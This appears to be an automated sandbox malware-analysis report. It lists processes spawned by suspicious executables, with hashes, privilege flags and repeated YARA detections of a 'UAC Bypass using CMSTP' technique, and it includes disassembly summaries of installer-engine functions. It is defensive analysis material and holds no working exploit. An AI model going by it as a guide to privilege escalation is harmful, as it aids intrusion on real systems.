                                                          MD5 hash:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1722899571.0000000003F99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:01:14:08
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          Imagebase:0x7ff718370000
                                                          File size:3'559'696 bytes
                                                          MD5 hash:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1778571972.0000000003DF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:01:14:08
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2022025745.0000000005366000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:01:14:08
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:01:14:33
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Imagebase:0x140000000
                                                          File size:2'364'728 bytes
                                                          MD5 hash:967F4470627F823F4D7981E511C9824F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2221794602.00000000025FE000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:01:14:46
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"
                                                          Imagebase:0x7ff718370000
                                                          File size:3'559'696 bytes
                                                          MD5 hash:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2162614521.0000000003A96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:01:14:46
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2216100615.0000000003390000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2217981386.000000000554C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:01:14:46
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:01:14:57
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"
                                                          Imagebase:0x7ff718370000
                                                          File size:3'559'696 bytes
                                                          MD5 hash:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2272761676.000000000361D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:01:14:58
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.2475629890.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:01:14:58
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:01:15:19
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          Imagebase:0x140000000
                                                          File size:2'364'728 bytes
                                                          MD5 hash:967F4470627F823F4D7981E511C9824F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2662759098.0000000002626000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 00873CC4 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 320fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 704 873cc4-873d51 call 89f8e0 * 2 GetFileAttributesW 709 873d85-873d88 704->709 710 873d53-873d5a GetLastError 704->710 711 8740d5 709->711 712 873d8e-873d91 709->712 713 873d5f-873d61 710->713 714 873d5c-873d5e 710->714 719 8740da-8740e3 711->719 715 873d93-873da6 SetFileAttributesW 712->715 716 873dca-873dd1 712->716 717 873d63-873d6c 713->717 718 873d6e 713->718 714->713 715->716 720 873da8-873dae GetLastError 715->720 721 873dd3-873dda 716->721 722 873de0-873de8 716->722 717->718 718->709 723 873d70-873d71 718->723 724 8740e5-8740e6 FindClose 719->724 725 8740ec-8740f3 719->725 726 873db0-873db9 720->726 727 873dbb 720->727 721->722 728 874058 721->728 729 873e25-873e40 call 872d58 722->729 730 873dea-873dfe GetTempPathW 722->730 731 873d76-873d80 call 873821 723->731 724->725 732 8740f5-8740fb call 8b5636 725->732 733 874100-874112 call 89e06f 725->733 726->727 737 873dc2-873dc8 727->737 738 873dbd 727->738 739 87405e-87406c RemoveDirectoryW 728->739 729->725 750 873e46-873e62 FindFirstFileW 729->750 730->729 740 873e00-873e06 GetLastError 730->740 731->725 732->733 737->731 738->737 739->719 745 87406e-874074 GetLastError 739->745 746 873e13 740->746 747 873e08-873e11 740->747 751 874076-874079 745->751 752 87407f-874085 745->752 748 873e15 746->748 749 873e1a-873e20 746->749 747->746 748->749 749->731 755 873e64-873e6a GetLastError 750->755 756 873e89-873e93 750->756 751->752 753 874087-874089 752->753 754 8740a1-8740a3 752->754 757 8740a5-8740ab 753->757 758 87408b-87409d MoveFileExW 753->758 754->719 754->757 759 873e77 755->759 760 873e6c-873e75 755->760 761 873e95-873e9e 756->761 762 873eba-873ee0 call 872d58 756->762 765 873ffa-874004 call 873821 757->765 758->757 764 87409f 758->764 766 873e7e-873e7f 759->766 767 873e79 759->767 760->759 768 873ea4-873eab 761->768 769 873fbd-873fcd FindNextFileW 761->769 762->719 775 873ee6-873ef3 762->775 764->754 765->719 766->756 767->766 768->762 774 873ead-873eb4 768->774 771 873fcf-873fd5 769->771 772 87404d-874052 GetLastError 769->772 771->756 776 874054-874056 772->776 777 8740b0-8740b6 GetLastError 772->777 774->762 774->769 779 873ef5-873ef7 775->779 780 873f22-873f29 775->780 776->739 781 8740c3 777->781 782 8740b8-8740c1 777->782 779->780 783 873ef9-873f09 call 872b0c 779->783 786 873fb7 780->786 787 873f2f-873f31 780->787 784 8740c5 781->784 785 8740ca-8740d0 781->785 782->781 783->719 796 873f0f-873f18 call 873cc4 783->796 784->785 785->765 786->769 789 873f33-873f46 SetFileAttributesW 787->789 790 873f4c-873f5a DeleteFileW 787->790 789->790 792 873fda-873fe0 GetLastError 789->792 790->786 793 873f5c-873f5e 790->793 797 873fe2-873feb 792->797 798 873fed 792->798 794 873f64-873f81 GetTempFileNameW 793->794 795 87402b-874031 GetLastError 793->795 799 873f87-873fa4 MoveFileExW 794->799 800 874009-87400f GetLastError 794->800 801 874033-87403c 795->801 802 87403e 795->802 812 873f1d 796->812 797->798 804 873ff4-873ff5 798->804 805 873fef 798->805 808 873fa6-873fad 799->808 809 873faf 799->809 806 874011-87401a 800->806 807 87401c 800->807 801->802 810 874045-87404b 802->810 811 874040 802->811 804->765 805->804 806->807 813 874023-874029 807->813 814 87401e 807->814 815 873fb5 MoveFileExW 808->815 809->815 810->765 811->810 812->786 813->765 814->813 815->786
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00873D40
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873D53
                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00873D9E
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873DA8
                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00873DF6
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873E00
                                                            • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00873E53
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873E64
                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00873F3E
                                                            • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00873F52
                                                            • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00873F79
                                                            • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00873F9C
                                                            • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00873FB5
                                                            • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00873FC5
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00873FDA
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00874009
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0087402B
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0087404D
                                                            • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00874064
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0087406E
                                                            • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00874095
                                                            • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008740B0
                                                            • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 008740E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                            • String ID: *.*$DEL$dirutil.cpp
                                                            • API String ID: 1544372074-1252831301
                                                            • Opcode ID: b5883baa41e41d34fd5d162e7151fdb953296edcbf378a8bb4a652f2ee3c5c66
                                                            • Instruction ID: 8680cef5a7a2b4ab91789ef9da73883dc6c05000ec01084935559924f4f134d3
                                                            • Opcode Fuzzy Hash: b5883baa41e41d34fd5d162e7151fdb953296edcbf378a8bb4a652f2ee3c5c66
                                                            • Instruction Fuzzy Hash: 6BB10A73D01639ABDB315A688C05B9ABA75FF40760F0182A1EE0CF7194DB72DE90DE91
                                                            Function 00875195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 816 875195-875243 call 89f8e0 * 2 GetModuleHandleW call 8b04f8 call 8b06ae call 87120a 827 875245 816->827 828 875259-87526a call 8742d7 816->828 829 87524a-875254 call 8b0237 827->829 834 875273-87528f call 875618 CoInitializeEx 828->834 835 87526c-875271 828->835 836 8754d4-8754db 829->836 841 875291-875296 834->841 842 875298-8752a4 call 8afcae 834->842 835->829 838 8754dd-8754e3 call 8b5636 836->838 839 8754e8-8754ea 836->839 838->839 844 8754ec-8754f3 839->844 845 8754fa-875518 call 87d82f call 88a8d6 call 88ab24 839->845 841->829 852 8752a6 842->852 853 8752b8-8752c7 call 8b0e07 842->853 844->845 848 8754f5 call 8841ec 844->848 865 875546-875559 call 874fa4 845->865 866 87551a-875522 845->866 848->845 855 8752ab-8752b3 call 8b0237 852->855 863 8752d0-8752df call 8b2af7 853->863 864 8752c9-8752ce 853->864 855->836 873 8752e1-8752e6 863->873 874 8752e8-8752f7 call 8b3565 863->874 864->855 876 875560-875567 865->876 877 87555b call 8b3a35 865->877 866->865 869 875524-875527 866->869 869->865 872 875529-875544 call 88434c call 875602 869->872 872->865 873->855 884 875300-87531f GetVersionExW 874->884 885 8752f9-8752fe 874->885 881 87556e-875575 876->881 882 875569 call 8b2efe 876->882 877->876 887 875577 call 8b1479 881->887 888 87557c-875583 881->888 882->881 890 875321-87532b GetLastError 884->890 891 875359-87539e call 8733c7 call 875602 884->891 885->855 887->888 893 875585 call 8afdbd 888->893 894 87558a-87558c 888->894 896 87532d-875336 890->896 897 875338 890->897 916 8753b1-8753c1 call 88752a 891->916 917 8753a0-8753ab call 8b5636 891->917 893->894 900 875594-87559b 894->900 901 87558e CoUninitialize 894->901 896->897 904 87533f-875354 call 873821 897->904 905 87533a 897->905 902 8755d6-8755df call 8b0113 900->902 903 87559d-87559f 900->903 901->900 919 8755e6-8755ff call 8b0802 call 89e06f 902->919 920 8755e1 call 8745ee 902->920 907 8755a5-8755ab 903->907 908 8755a1-8755a3 903->908 904->855 905->904 913 8755ad-8755c6 call 883d85 call 875602 907->913 908->913 913->902 935 8755c8-8755d5 call 875602 913->935 931 8753c3 916->931 932 8753cd-8753d6 916->932 917->916 920->919 931->932 936 87549e-8754ab call 874d39 932->936 937 8753dc-8753df 932->937 935->902 943 8754b0-8754b4 936->943 940 875476-875492 call 874ae5 937->940 941 8753e5-8753e8 937->941 949 8754c0-8754d2 940->949 953 875494 940->953 945 87544e-87546a call 8748ef 941->945 946 8753ea-8753ed 941->946 948 8754b6 943->948 943->949 945->949 960 87546c 945->960 951 875426-875442 call 874a88 946->951 952 8753ef-8753f2 946->952 948->949 949->836 951->949 962 875444 951->962 956 8753f4-8753f9 952->956 957 875403-875416 call 874c86 952->957 953->936 956->957 957->949 963 87541c 957->963 960->940 962->945 963->951
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00875217
                                                              • Part of subcall function 008B04F8: InitializeCriticalSection.KERNEL32(008DB5FC,?,00875223,00000000,?,?,?,?,?,?), ref: 008B050F
                                                              • Part of subcall function 0087120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0087523F,00000000,?), ref: 00871248
                                                              • Part of subcall function 0087120A: GetLastError.KERNEL32(?,?,?,0087523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00871252
                                                            • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00875285
                                                              • Part of subcall function 008B0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008B0E28
                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00875317
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00875321
                                                            • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0087558E
                                                            Strings
                                                            • Failed to run untrusted mode., xrefs: 008754B6
                                                            • Failed to get OS info., xrefs: 0087534F
                                                            • Failed to parse command line., xrefs: 00875245
                                                            • Failed to initialize XML util., xrefs: 008752F9
                                                            • Failed to initialize Regutil., xrefs: 008752C9
                                                            • Failed to initialize Cryputil., xrefs: 008752A6
                                                            • Failed to run per-user mode., xrefs: 00875494
                                                            • Failed to initialize core., xrefs: 008753C3
                                                            • Failed to run per-machine mode., xrefs: 0087546C
                                                            • engine.cpp, xrefs: 00875345
                                                            • Failed to initialize COM., xrefs: 00875291
                                                            • Failed to run RunOnce mode., xrefs: 0087541C
                                                            • Invalid run mode., xrefs: 008753F9
                                                            • Failed to initialize Wiutil., xrefs: 008752E1
                                                            • Failed to initialize engine state., xrefs: 0087526C
                                                            • 3.11.1.2318, xrefs: 00875384
                                                            • Failed to run embedded mode., xrefs: 00875444
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                            • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                            • API String ID: 3262001429-510904028
                                                            • Opcode ID: 100f24e6dcb69568833f5140da9a70c70ae03e229f5017700eb0e19b6223da63
                                                            • Instruction ID: cda1ea1926bd89b3ec170d61edeea60a583138ebf2b6c81cb5f45f94ae310720
                                                            • Opcode Fuzzy Hash: 100f24e6dcb69568833f5140da9a70c70ae03e229f5017700eb0e19b6223da63
                                                            • Instruction Fuzzy Hash: 29B18172D40A299BDB31AB688C46BED76A5FF04710F0481A5E90CF6355DBB4DE80CB92
                                                            Function 008B304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008B3609,00000000,?,00000000), ref: 008B3069
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0089C025,?,00875405,?,00000000,?), ref: 008B3075
                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 008B30B5
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008B30C1
                                                            • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 008B30CC
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008B30D6
                                                            • CoCreateInstance.OLE32(008DB6B8,00000000,00000001,008BB818,?,?,?,?,?,?,?,?,?,?,?,0089C025), ref: 008B3111
                                                            • ExitProcess.KERNEL32 ref: 008B31C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                            • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                            • API String ID: 2124981135-499589564
                                                            • Opcode ID: c6c9657dae5376fbef77dc875bec7684cbb7335b703da1fce8af9c94dd2a4467
                                                            • Instruction ID: 8a29cc804be5291da5eb979eb479a4c709626b0b1017b68dafc058d24fcaf8b9
                                                            • Opcode Fuzzy Hash: c6c9657dae5376fbef77dc875bec7684cbb7335b703da1fce8af9c94dd2a4467
                                                            • Instruction Fuzzy Hash: 36419E31A01619ABDB24ABAC8845BEEB7B8FF44710F114279F901EB340DBB1DE458B90
                                                            Function 00871070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008733C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008710DD,?,00000000), ref: 008733E8
                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 008710F6
                                                              • Part of subcall function 00871175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 00871186
                                                              • Part of subcall function 00871175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 00871191
                                                              • Part of subcall function 00871175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087119F
                                                              • Part of subcall function 00871175: GetLastError.KERNEL32(?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 008711BA
                                                              • Part of subcall function 00871175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008711C2
                                                              • Part of subcall function 00871175: GetLastError.KERNEL32(?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 008711D7
                                                            • CloseHandle.KERNELBASE(?,?,?,?,008BB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00871131
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                            • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                            • API String ID: 3687706282-3151496603
                                                            • Opcode ID: 8316ffd70a3ed8ab8a70f7cf098d8b64ab8633b1f73859007b7d95d7f3c51d30
                                                            • Instruction ID: ed183ed6e4af68542f5e891626bf04434d471ec346dd4356171fed6ce6e695fc
                                                            • Opcode Fuzzy Hash: 8316ffd70a3ed8ab8a70f7cf098d8b64ab8633b1f73859007b7d95d7f3c51d30
                                                            • Instruction Fuzzy Hash: 2821517190021CABDB109FA8DC49BEEBBB8FB05710F508115EA14FB285D7B099088BB5
                                                            Function 0088A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Failed to calculate working folder to ensure it exists., xrefs: 0088A0D8
                                                            • Failed create working folder., xrefs: 0088A0EE
                                                            • Failed to copy working folder., xrefs: 0088A116
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryErrorLastProcessWindows
                                                            • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                            • API String ID: 3841436932-2072961686
